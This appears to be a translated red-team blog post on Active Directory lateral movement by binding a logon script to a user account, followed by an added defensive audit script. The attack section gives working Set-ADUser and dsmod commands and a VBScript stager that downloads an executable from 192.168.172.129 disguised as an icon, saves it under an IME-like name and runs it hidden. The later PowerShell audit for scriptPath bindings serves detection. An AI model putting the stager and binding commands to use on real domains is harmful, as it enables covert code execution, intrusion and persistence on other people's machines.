0x1. Scenario
When you already hold Domain Controller or Domain Admin level privileges and want to move laterally to a domain-joined PC, but the target has its firewall enabled so 445/135 cannot be used, you can still get code execution on that host by binding a logon script to the user's account.
0x2. Methods
Method 1: PowerShell (the Active Directory module ships with Windows Server 2012 and later). First enumerate the current domain users:
Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8
Bind the script to a specific user:
Set-ADUser -Identity zhangsan -ScriptPath "download.vbs"
Unbind:
Set-ADUser -Identity zhangsan -ScriptPath " "
Method 2: bind with dsmod
dsmod user -loscr "download.vbs" "CN=john,CN=Users,DC=redteam,DC=com"
Unbind:
dsmod user -loscr "" "CN=john,CN=Users,DC=redteam,DC=com"
Refresh Group Policy:
shell gpupdate /force
VBS contents:
strFileURL = "http://192.168.172.129:82/logo.ico"
strHDLocation = "C:\Users\Public\Documents\ChsIME.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary
    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start
    Set objFSO = Createobject("Scripting.FileSystemObject")
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing
    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
strComputer = "."
set ws=wscript.createobject("wscript.shell")
val=ws.run ("C:\Users\Public\Documents\ChsIME.exe",0)
Upload the script to the DC under c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\, bind it with method 1 or method 2, then refresh Group Policy.
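From the defender's side, the technique above leaves two artefacts: a populated scriptPath attribute on the user object and a script file in the SYSVOL scripts directory. The following audit script is an added example, not part of the original post; it assumes the ActiveDirectory module (RSAT) and read access to SYSVOL, and the baseline list of approved script names is constructed for illustration.

```powershell
# Added example (not from the original post): audit logon-script bindings.
# Lists every user whose scriptPath is set, resolves the script against the
# domain's NETLOGON scripts directory, and flags anything that is missing,
# recently written, not in the approved baseline, or bound to a user object
# that was changed recently (unbinding with " " leaves a whitespace value,
# which is trimmed so it is not reported as a binding).
param(
    [string]$Domain = (Get-ADDomain).DNSRoot,
    [int]$RecentDays = 7,
    [string[]]$KnownScripts = @('logon.bat')   # constructed baseline; replace with your approved list
)
$scriptsRoot = "\\$Domain\SYSVOL\$Domain\scripts"
$cutoff = (Get-Date).AddDays(-$RecentDays)

$bound = Get-ADUser -LDAPFilter '(scriptPath=*)' -Properties scriptPath, whenChanged
foreach ($u in $bound) {
    $path = $u.scriptPath.Trim()
    if ([string]::IsNullOrWhiteSpace($path)) { continue }
    # scriptPath is normally relative to NETLOGON; a UNC value is used as-is.
    $full = if ($path -match '^\\\\') { $path } else { Join-Path $scriptsRoot $path }
    $exists = Test-Path -LiteralPath $full
    $lastWrite = if ($exists) { (Get-Item -LiteralPath $full).LastWriteTime } else { $null }
    $flags = @()
    if (-not $exists) { $flags += 'missing-file' }
    elseif ($lastWrite -gt $cutoff) { $flags += 'recently-modified' }
    if ($KnownScripts -notcontains (Split-Path $path -Leaf)) { $flags += 'not-in-baseline' }
    if ($u.whenChanged -gt $cutoff) { $flags += 'user-object-recently-changed' }
    [pscustomobject]@{
        User       = $u.SamAccountName
        ScriptPath = $path
        Resolved   = $full
        Exists     = $exists
        LastWrite  = $lastWrite
        Flags      = ($flags -join ',')
    }
}
```

Pipe the output to Format-Table or Export-Csv for review; with "Audit Directory Service Changes" enabled on the DC, changes to scriptPath also appear as Event ID 5136 entries naming that attribute, which is the real-time counterpart to this periodic sweep.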
Reference
https://rcoil.me/2018/11/%E3%80%90%E5%9F%9F%E6%B8%97%E9%80%8F%E3%80%91%E5%9C%A8%E5%9F%9F%E6%8E%A7%E4%B8%8A%E4%BD%BF%E7%94%A8cmd%E6%9B%B4%E6%94%B9%E5%9F%9F%E7%94%A8%E6%88%B7%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E4%B8%AD%E7%9A%84%E7%99%BB%E5%BD%95%E8%84%9A%E6%9C%AC/
From: https://www.cnblogs.com/websecyw/p/16657762.html